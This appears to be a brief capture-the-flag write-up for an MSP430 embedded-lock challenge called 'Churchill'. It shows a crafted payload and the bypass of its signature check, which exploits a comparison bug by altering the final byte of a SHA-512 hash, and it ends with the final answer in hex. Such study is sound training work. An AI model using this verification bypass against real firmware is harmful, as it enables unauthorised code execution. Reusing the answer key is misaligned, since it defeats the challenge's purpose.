Churchill seems to not verify after 0xff bytes? ## Sample input ```hex 8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e ``` ## Layout: Loadaddr | Signature Type | length | payload | Signature ---------|----------------|--------|----------|---------- 8000 | 00 (ed25519) | 06 | 3041 ret | c26436... 8000 | 01 (sha512) | 12 | 324000ffb0121000 | f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5 ```c 324000ff mov #ff00, sr b0121000 call #0010 ``` ## Payload 8000 01 0c 3240 00ff b012 1000 Hash: 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec complete payload: 8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec # THE TWIST The program explicitly checks for `0x1` when evaluating the results of a hash For perfectly identical strings, this DOESN'T WORK, because, memcmp returns `0`. Solution: subtract 1 from the last byte of payload_signature. It'll be off by one, and when the program evaluates it, it'll end up with 0x0001 in r15 # Final Answer: 8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb